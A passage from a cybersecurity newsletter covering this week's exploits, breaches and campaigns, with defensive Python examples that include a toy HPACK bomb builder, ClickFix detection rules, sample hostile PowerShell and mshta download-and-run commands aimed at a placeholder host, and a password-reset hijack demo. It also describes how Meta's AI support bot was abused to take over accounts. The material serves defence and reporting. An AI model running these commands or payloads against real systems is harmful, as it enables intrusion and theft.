This Week in Cybersecurity #55
The Speed Gap: Why Attackers Are Winning the Race and What Security Leaders Must Do About It
Your weekend catch-up on the most critical cybersecurity stories of the week, curated by James Azar
Good Morning, Security Gang!
Double espresso ready. This week’s briefing covers four full episodes and represents some of the most operationally significant coverage we’ve produced in months.
James opened the week with a line that defines the entire landscape right now: “The organizations that are going to weather this environment are the ones that match the attacker’s operational speed. Patch fast. Detect faster. Train your people because Carnival’s six million victims and Charter’s five million victims both started with one employee and one phone call.”
By the end of four episodes, that framing was validated at every level. A Palo Alto GlobalProtect VPN vulnerability went from disclosure to CISA KEV with a June 1 federal deadline. A Flowise AI platform zero-day received public exploit code enabling root access through a single malicious import. The HTTP/2 Bomb vulnerability discovered autonomously by OpenAI’s Codex could crash major web servers globally in under a minute. A VS Code zero-day with no patch available steals GitHub OAuth tokens through a one-click Jupyter notebook attack. Anthropic’s Mythos expanded to 150 more organizations across 15 countries including NATO and critical infrastructure operators. And Gamaredon deployed a USB-propagating worm with a Telegram-controlled C2 and built-in wiper module against Ukraine.
On the human side: Six million Carnival cruise customers exposed after one successful voice phishing call. A Google security engineer was charged with using confidential search data to place $1 million in prediction market bets. China’s intelligence services are systematically recruiting government insiders through LinkedIn at scale, as documented in a Five Eyes joint advisory. And attackers spent five months quietly extracting a stock exchange executive’s entire Outlook mailbox in small batches, using Microsoft-owned IP addresses to bypass DNS monitoring.
The week closed with a reminder James keeps returning to: “Forget all the shiny tools. If we can’t do the fundamentals well, none of those tools are going to help. That’s the reality.”
Let’s get into all of it.
🌐 Infrastructure & Network Exploitation
Palo Alto GlobalProtect VPN CVE-2026-3401: CISA KEV, June 1 Federal Deadline
Active exploitation of CVE-2026-3401 in Palo Alto Networks’ GlobalProtect VPN platform, targeting local administrator accounts, was confirmed by CISA, which added the flaw to the KEV catalog with a June 1 federal remediation deadline. The vulnerability continues the 2026 pattern of edge devices (VPNs, firewalls, and remote access appliances) serving as primary entry points for ransomware operators and nation-state actors. If immediate patching is not possible, Palo Alto recommends separating the GlobalProtect authentication cookie certificate from the HTTP service certificate to disrupt the attack path. Internet-facing security infrastructure is now one of the highest-priority attack surfaces in enterprise environments.
HTTP/2 Bomb CVE-2026-49975: One Client Can Crash a Server in Twenty Seconds
Researchers disclosed the “HTTP/2 Bomb”, a remote denial-of-service vulnerability affecting Apache HTTP Server, Microsoft IIS, Envoy Proxy, and Cloudflare’s Pingora. The attack combines HPACK compression abuse (small header blocks on the wire that decode into very large allocations on the server) with Slowloris-style connection holding so that the memory is never released. A single client on a residential connection can consume and hold approximately 32 gigabytes of memory on vulnerable Apache and Envoy servers in roughly twenty seconds. Researchers estimate more than 880,000 public websites are potentially affected under default configurations. Nginx patched earlier this year; Apache released fixes in late May; Microsoft IIS, Envoy, and Cloudflare’s Pingora remained unpatched at publication. The vulnerability was discovered using OpenAI’s Codex platform, the second AI-assisted vulnerability disclosure this week. Patch Apache and Nginx immediately, enforce strict per-connection and per-stream limits, cap the amount of decoded header data a connection may produce, and review mitigation options at the load balancer and WAF layers.
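The amplification at the heart of the HPACK abuse is easy to see with a toy encoder and decoder. The block below is an added illustration, not code from the researchers or any of the affected servers: it implements just enough of RFC 7541 (integer and string literals without Huffman coding, literal-with-incremental-indexing, and indexed header fields, with an empty static table so only dynamic indices 62 and up are meaningful) to show one large literal being inserted into the dynamic table and then referenced by a one-byte index a thousand times, and a decoder that caps the total decoded header bytes per block, which is the kind of limit the mitigations above are asking for.

```python
"""Toy HPACK (RFC 7541) encoder/decoder showing the dynamic-table amplification
the HTTP/2 Bomb abuses, with a decoded-size cap as the defensive counterpart.
Added illustration only: no Huffman coding, and the static table is left
empty, so only dynamic-table indices (62 and up, as in the RFC) are valid."""

STATIC_TABLE_LEN = 61          # RFC 7541 static table occupies indices 1..61
ENTRY_OVERHEAD = 32            # per-entry bookkeeping charged by RFC 7541 section 4.1
DEFAULT_TABLE_SIZE = 4096      # SETTINGS_HEADER_TABLE_SIZE default


class DecodeLimitExceeded(Exception):
    pass


def _encode_int(value, prefix_bits, flags=0):
    """RFC 7541 section 5.1 integer with an N-bit prefix."""
    max_prefix = (1 << prefix_bits) - 1
    if value < max_prefix:
        return bytes([flags | value])
    out = bytearray([flags | max_prefix])
    value -= max_prefix
    while value >= 0x80:
        out.append((value & 0x7F) | 0x80)
        value >>= 7
    out.append(value)
    return bytes(out)


def _decode_int(buf, pos, prefix_bits):
    max_prefix = (1 << prefix_bits) - 1
    value = buf[pos] & max_prefix
    pos += 1
    if value < max_prefix:
        return value, pos
    shift = 0
    while True:
        b = buf[pos]
        pos += 1
        value += (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:
            return value, pos


def _encode_str(s):
    return _encode_int(len(s), 7) + s          # H bit clear: raw octets, no Huffman


def _decode_str(buf, pos):
    length, pos = _decode_int(buf, pos, 7)
    return bytes(buf[pos:pos + length]), pos + length


def literal_with_indexing(name, value):
    return _encode_int(0, 6, 0x40) + _encode_str(name) + _encode_str(value)   # 01 prefix, literal name


def indexed(index):
    return _encode_int(index, 7, 0x80)         # 1 prefix: reference an existing table entry


def build_bomb_block(pad_len=4000, refs=1000):
    """One large literal inserted into the dynamic table, then many one-byte references to it."""
    block = literal_with_indexing(b"x-pad", b"A" * pad_len)
    return block + indexed(STATIC_TABLE_LEN + 1) * refs     # index 62 = newest dynamic entry


def decode_header_block(buf, max_decoded_bytes=None, table_size=DEFAULT_TABLE_SIZE):
    """Decode a header block; optionally refuse once decoded bytes exceed a cap."""
    dyn, dyn_bytes, headers, decoded, pos = [], 0, [], 0, 0
    while pos < len(buf):
        first = buf[pos]
        if first & 0x80:                                   # indexed header field
            idx, pos = _decode_int(buf, pos, 7)
            if idx <= STATIC_TABLE_LEN or idx - STATIC_TABLE_LEN > len(dyn):
                raise ValueError("index %d not available" % idx)
            name, value = dyn[idx - STATIC_TABLE_LEN - 1]
        elif first & 0x40:                                 # literal with incremental indexing
            name_idx, pos = _decode_int(buf, pos, 6)
            if name_idx != 0:
                raise ValueError("static-table names not supported in this toy")
            name, pos = _decode_str(buf, pos)
            value, pos = _decode_str(buf, pos)
            dyn.insert(0, (name, value))
            dyn_bytes += len(name) + len(value) + ENTRY_OVERHEAD
            while dyn_bytes > table_size:                  # evict oldest entries
                n, v = dyn.pop()
                dyn_bytes -= len(n) + len(v) + ENTRY_OVERHEAD
        else:
            raise ValueError("representation not supported in this toy")
        decoded += len(name) + len(value)
        if max_decoded_bytes is not None and decoded > max_decoded_bytes:
            raise DecodeLimitExceeded("decoded header bytes exceed %d" % max_decoded_bytes)
        headers.append((name, value))
    return headers, decoded


def amplification(pad_len=4000, refs=1000):
    """(wire bytes, decoded bytes) for one bomb block."""
    block = build_bomb_block(pad_len, refs)
    return len(block), decode_header_block(block)[1]


def rejected_by_cap(block, cap):
    try:
        decode_header_block(block, max_decoded_bytes=cap)
        return False
    except DecodeLimitExceeded:
        return True


if __name__ == "__main__":
    wire, decoded = amplification()
    print("wire bytes:", wire, "decoded bytes:", decoded, "ratio: %.0fx" % (decoded / wire))
    print("64 KiB cap rejects block:", rejected_by_cap(build_bomb_block(), 64 * 1024))
```

About 5 KB on the wire decodes to roughly 4 MB of header data, and nothing stops the client from sending a new HEADERS frame on every stream it is allowed to open. Per-block decode caps and per-connection stream limits attack the first factor; idle and read timeouts on the connection attack the Slowloris half.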
ClickFix Campaign: Harvard, Oxford, 700+ Trusted Websites as Malware Delivery Infrastructure
The ClickFix campaign continues expanding, actively exploiting Ghost CMS vulnerabilities to compromise over 700 websites including Harvard University, Oxford University, Auburn University, and DuckDuckGo-powered properties. Injected JavaScript presents visitors with fake CAPTCHA or browser verification prompts instructing them to press Windows+R and execute commands that launch PowerShell payloads. This bypasses traditional security awareness training entirely: users trust browser prompts on legitimate, well-known domains in ways they no longer trust email attachments. Patch Ghost CMS to version 6.20.0 immediately and teach users that no legitimate website will ever ask them to paste commands into a terminal or the Run dialog.
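On the endpoint, the Run-dialog step leaves two reliable traces: an interpreter spawned by explorer.exe with a hidden-window, encoded, or download-and-execute command line, and the pasted text landing in the user's RunMRU registry key. The triage logic below is an added example, not from the campaign reporting; the events are constructed in the shape of Sysmon Event ID 1 (process create) and Event ID 13 (registry value set), and the hostname in them is a placeholder rather than a real indicator.

```python
"""Triage for the ClickFix execution pattern: Win+R, paste, Enter.
Added example; event records are constructed Sysmon-style dicts."""
import re

INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "curl.exe", "bitsadmin.exe")

# Command-line fragments that ClickFix lures lean on.
MARKERS = [
    (re.compile(r"-(w|win|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "in-memory execution"),
    (re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|curl)\b", re.I), "remote fetch"),
    (re.compile(r"\bmshta\b.*https?://", re.I), "mshta remote HTA"),
]


def score_command(cmdline):
    return [label for rx, label in MARKERS if rx.search(cmdline)]


def triage_event(ev):
    """Return (is_suspicious, reasons) for one event."""
    if ev.get("EventID") == 1:
        image = ev["Image"].lower().rsplit("\\", 1)[-1]
        parent = ev["ParentImage"].lower().rsplit("\\", 1)[-1]
        reasons = score_command(ev["CommandLine"])
        # explorer.exe as parent is what ties the launch to the Run dialog
        if image in INTERPRETERS and parent == "explorer.exe" and reasons:
            return True, ["spawned from explorer.exe (Run dialog)"] + reasons
    elif ev.get("EventID") == 13 and "\\runmru\\" in ev["TargetObject"].lower():
        reasons = score_command(ev["Details"])
        if reasons:
            return True, ["RunMRU entry"] + reasons
    return False, []


def triage(events):
    hits = []
    for ev in events:
        suspicious, reasons = triage_event(ev)
        if suspicious:
            hits.append((ev, reasons))
    return hits


# Constructed sample events; verify.example is a placeholder, not a real IOC.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://verify.example/check.txt)"'},
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a",
     "Details": "mshta https://verify.example/captcha.hta\\1"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -NoProfile -File C:\scripts\backup.ps1"},      # benign admin use
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Agent\agent.exe",
     "CommandLine": "powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},  # not from Run dialog
]

if __name__ == "__main__":
    for ev, reasons in triage(SAMPLE_EVENTS):
        print(ev.get("CommandLine") or ev.get("Details"), "->", ", ".join(reasons))
```

The fourth event is deliberately left unflagged: it carries the same markers but is not tied to the Run dialog, and belongs to a broader encoded-PowerShell rule rather than this one. Scoping the rule tightly keeps its precision high enough to page on.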
Oracle WebLogic Added to CISA KEV: Cobalt Strike and Ransomware Payload Deployment
CISA added CVE-2024-21182, a critical Oracle WebLogic RCE vulnerability, to the KEV catalog after confirming attackers are using it to deploy Cobalt Strike and ransomware. Patch immediately and review exposed WebLogic services.
ASUS Router Vulnerabilities: No Patch Until End of June
Two critical vulnerabilities in ASUS Wave 7 mesh routers expose credentials and allow persistent backdoor installation. Patches are not expected until late June. Organizations should restrict management interfaces to trusted IP ranges and implement compensating controls in the interim.
WordPress Kirki Plugin CVE-2026-8206 CVSS 9.8: One Million Sites, No Credentials Required
A critical authentication bypass in the Kirki WordPress page builder plugin allows attackers to substitute their own email address during password reset, so the legitimate reset link is generated and sent directly to the attacker: no credentials required, no user interaction, one request. Over one million WordPress installations are affected. Once access is gained, attackers install malicious plugins, create rogue admin accounts, inject SEO spam, and deploy backdoors. Update to version 6.0.7 or disable the plugin entirely.
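The defect class is worth seeing in miniature, because it recurs in custom reset handlers far beyond WordPress. The block below is an added, framework-free illustration and not the plugin's code: the vulnerable handler mails the reset link to whatever address arrives in the request, while the hardened one only mails the address already on file for the account, answers identically whether or not the account exists, and checks the token in constant time as a single-use hashed secret. The user store, mailbox and token table are in-memory stand-ins.

```python
"""Password-reset recipient confusion, vulnerable and hardened side by side.
Added illustration; users, tokens and mail delivery are in-memory stand-ins."""
import hashlib
import hmac
import secrets

USERS = {"admin": {"email": "owner@example.com"}}   # constructed user store
MAILBOX = []                                         # stand-in for the outbound mailer
RESET_TOKENS = {}                                    # username -> sha256(token)


def _issue_token(username):
    token = secrets.token_urlsafe(32)
    RESET_TOKENS[username] = hashlib.sha256(token.encode()).hexdigest()   # store only the hash
    return token


def request_reset_vulnerable(form):
    """login=admin plus email=attacker@... in one request delivers admin's link to the attacker."""
    user = USERS.get(form["login"])
    if not user:
        return "no such user"                         # also leaks account existence
    token = _issue_token(form["login"])
    MAILBOX.append((form["email"], f"https://example.com/reset?token={token}"))   # recipient from request
    return "reset link sent"


def request_reset_hardened(form):
    """Recipient comes from the stored record; the response never reveals existence."""
    user = USERS.get(form["login"])
    if user:
        token = _issue_token(form["login"])
        MAILBOX.append((user["email"], f"https://example.com/reset?token={token}"))
    return "if the account exists, a reset link has been sent"


def consume_token(username, token):
    """Constant-time comparison against the stored hash; the token is single use."""
    expected = RESET_TOKENS.get(username)
    if expected is None:
        return False
    presented = hashlib.sha256(token.encode()).hexdigest()
    if hmac.compare_digest(expected, presented):
        del RESET_TOKENS[username]
        return True
    return False


def attacker_receives_link(handler):
    """Drive one attacker-crafted reset request through a handler; return who got mail."""
    MAILBOX.clear()
    handler({"login": "admin", "email": "attacker@evil.example"})
    return [recipient for recipient, _ in MAILBOX]


if __name__ == "__main__":
    print("vulnerable ->", attacker_receives_link(request_reset_vulnerable))
    print("hardened   ->", attacker_receives_link(request_reset_hardened))
```

When auditing a reset flow, the single question to ask is where the recipient address is read from: anything other than the account record the login resolved to is this bug.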
🤖 AI as Discovery Engine, Target, and Threat Multiplier
Anthropic Mythos Expands to 150 Organizations Across 15 Countries Including NATO
Anthropic announced a Project Glasswing expansion adding 150 organizations across 15 countries to the Mythos vulnerability discovery platform, including NATO, ENISA, Samsung, healthcare providers, utilities, communications providers, and critical infrastructure operators. Mythos has already identified 23,000-plus potential vulnerabilities, 10,000-plus high and critical issues, and thousands of previously unknown flaws. The announcement coincided directly with the Trump AI executive order signed the same day. Mythos is functioning as an autonomous vulnerability discovery platform operating at a scale no human team can match. The future of cybersecurity increasingly depends on whether organizations gain access to tools like Mythos or become targets discovered by them.
Trump Signs AI Security Vetting Executive Order: Voluntary Review Framework
President Trump signed an executive order establishing a voluntary federal review framework for advanced AI models, assessing national security risks before public release. The order stepped back from an earlier proposal requiring mandatory 90-day reviews, replacing it with a 30-day voluntary government evaluation process. The framework introduces AI cybersecurity capability benchmarking, national security risk evaluations, an AI cybersecurity clearinghouse, and government-industry collaboration mechanisms. The voluntary structure creates incentives for collaboration rather than compliance-driven resistance; the practical question is whether government oversight can evolve quickly enough to remain relevant.
Flowise AI Platform CVE-2026-40933: Public Exploit, Root Access via Single Import
Public working exploit code was released for a critical RCE vulnerability in Flowise, the popular open-source AI orchestration platform used to build LLM workflows and AI agents. One malicious chat flow import triggers OS-level code execution with the privileges of the Flowise process (often root). Flowise deployments are commonly connected to databases, cloud services, API keys, internal applications, and AI development environments, so compromising Flowise means compromising everything connected to it. Patch immediately, restrict import permissions, review administrative access, and rotate all connected credentials.
OpenAI Codex Token Theft via npm Package: 26,000 Weekly Downloads
A malicious npm package called codex-ui-android silently exfiltrated OpenAI Codex OAuth tokens, including long-lived refresh tokens, and had accumulated 26,000 weekly downloads before detection. Revoke and reissue all Codex credentials immediately for any organization that may have had the package installed.
Russian GreyVibe Uses AI Across Entire Kill Chain
Researchers documented GreyVibe, a previously unknown Russian-linked threat group targeting Ukrainian organizations since August 2025, using generative AI throughout nearly every operational stage: Ideogram for phishing imagery, ChatGPT for lure development and malware support, Google Gemini for obfuscation and backend infrastructure. Attack chains include fake CAPTCHA pages, spear phishing, fraudulent charity websites, and TrickBot ecosystem malware families. This is one of the clearest documented cases of a threat actor integrating generative AI into operational workflows rather than experimentally. Defenders should expect phishing campaigns and social engineering to become increasingly personalized, scalable, and indistinguishable from legitimate communications.
AI Discovers Redis Zero-Day CVE-2026-23479 Missed for Two Years
An autonomous security tool identified a use-after-free vulnerability in Redis that had existed unnoticed since 2023. Public exploit code is now available. Redis Cloud patched; self-hosted deployments require immediate upgrade.
Chinese TA-4922 Uses LLM-Assisted Malware Development
Proofpoint reported that TA-4922, a Chinese cybercrime group targeting Europe, appears to be using LLM-assisted techniques to accelerate malware creation and campaign generation. AI-assisted offensive development is no longer exclusive to well-resourced nation-state programs.
GitLab Emergency Patch: Duo AI Identity Confusion Enables Privilege Escalation
GitLab released emergency updates for a flaw allowing an authenticated user to trigger AI-assisted workflows under another user’s identity, enabling privilege escalation and lateral movement within development environments. GitLab.com is patched; self-managed instances must upgrade immediately.
🧬 Supply Chain & Developer Ecosystem
VS Code Zero-Day: GitHub OAuth Token Theft via One-Click Jupyter Notebook — No Patch
Security researcher Amar Askar publicly disclosed a VS Code zero-day with no patch available that steals GitHub OAuth tokens through a single malicious Jupyter notebook. By delivering a notebook file, attackers execute JavaScript inside a WebView iframe, which silently installs a malicious extension via synthetic keyboard shortcuts and exploits GitHub’s automatic authentication between GitHub.com and GitHub.dev. The extension intercepts and exfiltrates OAuth tokens before they reach GitHub. These tokens provide access to every private repository the victim can access. No patch is available. Review installed VS Code extensions, restrict use of untrusted Jupyter notebooks, and disable notebook functionality on systems where it is not required.
Red Hat npm Supply Chain Attack “Miasma”: 32 Packages, 117,000 Weekly Downloads
The “Miasma” campaign compromised 32 official Red Hat npm packages with over 117,000 combined weekly downloads, originating from the compromise of a Red Hat employee’s GitHub account. Attackers injected malicious code into repositories and leveraged GitHub Actions OIDC workflows to distribute malware through trusted package pipelines, harvesting AWS, Azure, and GCP credentials, GitHub tokens, SSH keys, and npm authentication tokens. The malware represents an evolution of the Mini Shai-Hulud campaign. Rotate all cloud and development credentials exposed to affected packages immediately and review build pipelines for signs of compromise.
Microsoft Dispute With Nightmare Eclipse Researcher — Then Reversed
Microsoft formally stated that publishing working exploit code without coordinated disclosure is “never justifiable” and signaled potential Digital Crimes Unit action against Nightmare Eclipse, who disclosed six Windows zero-days, three already in CISA KEV, three unpatched with public PoC available. Within 24 hours, Microsoft reversed course and clarified it has no plans to pursue legal action against independent security researchers, following significant community backlash. The episode highlights the enduring tension between bug bounty program fairness, researcher incentives, and responsible disclosure.
Container and Kubernetes Attacks Growing: Exposed Docker APIs and Weak RBAC
Researchers warned about active exploitation of container and Kubernetes misconfigurations (exposed Docker APIs, weak RBAC permissions, and poisoned container images), with campaigns specifically targeting cloud-native infrastructure and Kubernetes secrets.
Dashlane Detects Brute Force Campaign Against Customer Accounts
Dashlane confirmed detection and mitigation of a brute-force campaign attempting to register unauthorized devices. Some encrypted vaults were copied; no master passwords exposed. Customers should review registered devices and account activity.
💥 Ransomware & Destructive Operations
NightSpire Ransomware: 175 Organizations Across 28 Industries
NightSpire continues expanding, with 175 organizations impacted across 28 industries including hospitals, schools, financial institutions, and government agencies. The group runs its operations without custom malware: exposed RDP and FortiOS vulnerabilities for entry; Chrome Remote Desktop and AnyDesk for persistence; MegaSync for exfiltration; 7-Zip for compression. Legitimate tooling end to end means no EDR triggers. Audit exposed RDP access, FortiOS patching status, and unauthorized remote administration software across all environments.
🔓 Data Breaches & Identity Exposures
Carnival Cruise Lines: Six Million Victims, One Phone Call
Carnival Cruise Lines confirmed nearly six million individuals affected by an April breach originating from a single social engineering attack against an employee account. ShinyHunters claimed responsibility. Exposed data includes names, email addresses, phone numbers, dates of birth, driver’s license numbers, and passport information. Credit monitoring does not protect against identity fraud involving passport data. Frontline employees remain one of the most critical attack surfaces in any organization.
Charter Communications: 42 Million Records via Voice Phishing
Charter Communications confirmed approximately 42 million customer records exposed following a voice phishing attack against a Microsoft Entra account, which became the pivot point into Salesforce. The ShinyHunters SaaS playbook (vishing against the identity provider, then Salesforce access, then large-scale data extraction) has now been executed against Charter, Carnival, 7-Eleven, Cushman & Wakefield, Aman Resorts, and dozens of others in 2026 alone.
UK Visa Portal: 100,000 Biometric Identity Documents Leaked
A third-party UK visa processing portal leaked more than 100,000 passport scans and biometric selfies. When journalists reported the exposure, the company responded with lawyers before engineers. At time of reporting, the leak remained unresolved. Passport scans combined with biometric selfies enable KYC bypasses, fake identity creation, and fraudulent financial account openings. This perfectly captures the industry’s most persistent operational failure: organizations still treating cybersecurity incidents as communications crises rather than technical emergencies.
Meta AI Support Bot Enabled Instagram Account Takeover
Meta’s AI support chatbot was exploited by attackers who discovered it could be used to request account recovery actions on behalf of victims: adding an attacker-controlled email address, triggering legitimate password resets, and gaining full account control without the owner’s involvement. Victims included high-profile government, military, and cybersecurity community accounts. Meta fixed the issue, but the incident establishes a new category: AI systems granted administrative authority without sufficient identity verification become privileged attack surfaces. This is not the last AI trust-boundary failure we will see.
Five-Month Espionage Campaign Extracts Stock Exchange Executive’s Outlook Mailbox
Symantec documented a five-month operation quietly extracting a senior executive’s Outlook mailbox in carefully staged increments. Attackers used malware disguised as Adobe and OneDrive services, exfiltrated through Dropbox and personal OneDrive accounts, and used hardcoded Microsoft-owned IP addresses to bypass DNS monitoring. Small date-based data batches avoided triggering large-transfer alerts. Market-moving information, regulatory discussions, merger activity, and strategic correspondence represent intelligence value far exceeding the cost of a disruptive attack. The most dangerous adversaries aren’t making noise; they’re remaining invisible.
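The detection lesson is that a per-transfer size threshold is blind to this by design. The block below is an added example, not from the Symantec report: it runs a classic single-upload threshold and a cumulative check over the same constructed proxy log, where the running total per user and destination is kept over a trailing window and only alerts when that total was built up across several distinct days. The log lines, destination list and thresholds are constructed placeholders to tune per environment.

```python
"""Cumulative-egress detection for low-and-slow exfiltration to personal cloud storage.
Added example; the proxy log and thresholds are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed proxy log: timestamp, user, destination host, bytes sent.
PROXY_LOG = """\
2026-01-05T09:12:44Z exec1 www.dropbox.com 18874368
2026-01-06T09:15:02Z exec1 www.dropbox.com 19922944
2026-01-07T09:11:37Z exec1 www.dropbox.com 17825792
2026-01-08T09:14:59Z exec1 www.dropbox.com 20971520
2026-01-09T09:13:21Z exec1 www.dropbox.com 18350080
2026-01-12T09:12:05Z exec1 www.dropbox.com 19398656
2026-01-13T09:10:48Z exec1 www.dropbox.com 18874368
2026-01-13T14:02:11Z dev7 www.dropbox.com 734003200
2026-01-14T11:40:00Z exec1 outlook.office365.com 2097152
"""

PERSONAL_STORAGE = {"www.dropbox.com", "onedrive.live.com", "drive.google.com", "mega.nz"}
PER_TRANSFER_ALERT = 100 * 1024 * 1024      # the classic single-upload threshold
WINDOW = timedelta(days=30)                 # trailing window for the running total
CUMULATIVE_ALERT = 100 * 1024 * 1024        # same byte count, but summed over the window
MIN_DAYS = 5                                # must have accumulated over this many distinct days


def parse(log):
    rows = []
    for line in log.splitlines():
        ts, user, host, nbytes = line.split()
        rows.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), user, host, int(nbytes)))
    return rows


def single_transfer_alerts(rows):
    """What a size-per-upload rule catches: only the noisy case."""
    return [(u, h, b) for _, u, h, b in rows if h in PERSONAL_STORAGE and b >= PER_TRANSFER_ALERT]


def low_and_slow_alerts(rows):
    """Running total per (user, host) inside a trailing window, flagged when the
    total crosses the threshold and was spread over several distinct days."""
    by_key = defaultdict(list)
    for ts, u, h, b in sorted(rows):
        if h in PERSONAL_STORAGE:
            by_key[(u, h)].append((ts, b))
    alerts = []
    for (u, h), events in by_key.items():
        window = []
        for ts, b in events:
            window.append((ts, b))
            window = [(t, n) for t, n in window if ts - t <= WINDOW]   # drop aged-out events
            total = sum(n for _, n in window)
            days = {t.date() for t, _ in window}
            if total >= CUMULATIVE_ALERT and len(days) >= MIN_DAYS:
                alerts.append((u, h, total, len(days)))
                break          # one alert per key here; a real pipeline would suppress repeats
    return alerts


if __name__ == "__main__":
    rows = parse(PROXY_LOG)
    print("single-transfer:", single_transfer_alerts(rows))
    print("low-and-slow:", low_and_slow_alerts(rows))
```

In the constructed data the executive's 17 to 20 MB daily uploads never trip the single-transfer rule, but the running total crosses 100 MB on the sixth day. The MIN_DAYS condition is what separates patient staging from one bulk upload, which the first rule already handles. Keying on personal-storage destinations is deliberate: the same traffic to a sanctioned corporate tenant is normal.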
🌐 Geopolitical & Nation-State Threats
Gamaredon Deploys USB Worm with Telegram C2 and Wiper Module Against Ukraine
Russia’s FSB-linked Gamaredon exploited WinRAR CVE-2025-8088 to deploy a multi-stage infection chain including GammaLoad (downloader), GammaWorm (USB-propagating worm hiding via NTFS alternate data streams), GammaSteal (exfiltration to AWS S3, with Telegram channels for C2), and GammaWipe (destructive wiper module). Telegram-based C2 blends malicious communications into legitimate enterprise traffic. Gamaredon stands apart from many threat groups for its sustained operational patience: campaigns remain active for months, continuously adapting. Organizations with Ukrainian partners or shared infrastructure should patch WinRAR immediately and monitor for suspicious outbound Telegram traffic and unexpected S3 uploads.
Five Eyes Joint Advisory: China Systematically Recruiting Government Insiders via LinkedIn
A joint advisory from U.S., Canadian, UK, Australian, and New Zealand intelligence agencies documented Chinese intelligence services systematically recruiting government employees, military personnel, contractors, and critical infrastructure workers through LinkedIn, Indeed, and Upwork. The recruitment funnel: initial contact through professional platforms → access and value evaluation → harmless research requests → gradually sensitive tasking. Compensation comes through PayPal, Payoneer, cryptocurrency, and wire transfers. Once trust is established, communications migrate to Signal and Telegram, moving activity outside organizational visibility. Classified access is not required to be a target: facility layouts, contract details, budget information, and vendor relationships have significant intelligence value when aggregated. Use this advisory to review insider threat awareness programs and LinkedIn exposure policies immediately.
Mustang Panda Returns with New PlugX Delivery via Fake Adobe Prompts
Chinese APT Mustang Panda resurfaced using fake Adobe Acrobat update prompts to deliver PlugX malware, leveraging signed binaries and memory-only execution techniques to reduce detection. Hunt for Mustang Panda PlugX indicators across endpoints.
Iranian APT Expands Across Nine Countries, Adds Aviation Supply Chain Targeting
MuddyWater campaigns across nine countries in Q1 2026 refined DLL side-loading tradecraft through trusted executables including fmap.exe and SentinelOne Memory Scanner components. A separate Iranian cluster simultaneously targeted aviation software providers through credential harvesting, pre-positioning for a downstream pivot into airlines, airports, and aerospace organizations.
🔐 Identity, Authentication & Insider Threats
Kali365 MFA Bypass: FBI IC3 Warning, OAuth Device Code Abuse at Scale
The FBI warned about Kali365, a phishing-as-a-service platform that bypasses Microsoft 365 MFA by abusing the OAuth device code flow, the authentication flow designed for smart TVs and printers. Victims authenticate normally and MFA completes successfully, but the resulting tokens are issued to the attacker’s client, giving full account access. The platform includes AI-generated phishing lures, real-time victim dashboards, and Telegram-based infrastructure, and has been used in hundreds of attacks across manufacturing, healthcare, education, government, and financial sectors. Restrict or disable device code authentication flows through Microsoft Entra Conditional Access policies where operationally feasible.
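Two concrete pieces of that last recommendation, as an added example rather than anything from the FBI notice: the Conditional Access policy body that blocks the device code flow, expressed in the Microsoft Graph conditionalAccessPolicy schema (the authenticationFlows condition with transferMethods set to deviceCodeFlow), and a triage pass over Entra sign-in records that surfaces device-code sign-ins, using the signIn resource's authenticationProtocol and authenticationRequirement fields. The sign-in records, the expected-client list and the address ranges are constructed; the policy is built as data for review and would be posted with your own Graph client.

```python
"""Block the device code flow via Conditional Access, and find where it is still used.
Added example; sign-in records, address ranges and the client allowlist are constructed."""
import ipaddress
import json


def block_device_code_policy(name="Block device code flow", enforce=False):
    # Start in report-only, then enforce once the sign-in review shows no
    # legitimate dependency (meeting-room devices, CLI tooling and the like).
    return {
        "displayName": name,
        "state": "enabled" if enforce else "enabledForReportingButNotEnforced",
        "conditions": {
            "users": {"includeUsers": ["All"]},
            "applications": {"includeApplications": ["All"]},
            "authenticationFlows": {"transferMethods": "deviceCodeFlow"},
        },
        "grantControls": {"operator": "OR", "builtInControls": ["block"]},
    }


# Constructed: egress ranges interactive logins are expected from, and clients
# for which device code sign-ins are an accepted pattern in this organization.
KNOWN_NETS = [ipaddress.ip_network("203.0.113.0/24"), ipaddress.ip_network("198.51.100.0/24")]
EXPECTED_DEVICE_CODE_CLIENTS = {"Microsoft Azure CLI"}


def triage_signins(records, known_nets=KNOWN_NETS, expected_clients=EXPECTED_DEVICE_CODE_CLIENTS):
    """Return every device-code sign-in; 'high' when the client is not one that is
    expected to use the flow or the source address is outside known ranges."""
    findings = []
    for rec in records:
        if rec.get("authenticationProtocol") != "deviceCode":
            continue
        addr = ipaddress.ip_address(rec["ipAddress"])
        known_net = any(addr in net for net in known_nets)
        expected = rec.get("appDisplayName") in expected_clients
        findings.append({
            "user": rec["userPrincipalName"],
            "ip": rec["ipAddress"],
            "app": rec.get("appDisplayName"),
            "mfa": rec.get("authenticationRequirement") == "multiFactorAuthentication",
            "severity": "medium" if (known_net and expected) else "high",
        })
    return findings


# Constructed records in the shape of the Graph signIn resource.
SAMPLE_SIGNINS = [
    {"userPrincipalName": "alice@example.com", "ipAddress": "203.0.113.10",
     "appDisplayName": "Microsoft Azure CLI", "authenticationProtocol": "deviceCode",
     "authenticationRequirement": "multiFactorAuthentication"},
    {"userPrincipalName": "bob@example.com", "ipAddress": "192.0.2.77",
     "appDisplayName": "Microsoft Office", "authenticationProtocol": "deviceCode",
     "authenticationRequirement": "multiFactorAuthentication"},
    {"userPrincipalName": "carol@example.com", "ipAddress": "192.0.2.78",
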